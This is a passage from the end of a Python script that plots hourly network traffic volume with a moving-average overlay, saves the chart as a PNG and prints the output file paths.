    plt.xlabel("Date (UTC)")
    plt.ylabel("MiB per Hourly Bucket (log scale)")
    title = "Hourly Traffic (MiB/hour) with MA(3) Overlay"
    if args.server:
        title += f" — server={args.server}"
    plt.title(title)
    plt.legend()
    plt.tight_layout()

    plt.savefig(args.out_png)
    print(f"Wrote: {args.out_tsv}")
    print(f"Wrote: {args.out_png}")


if __name__ == "__main__":
    main()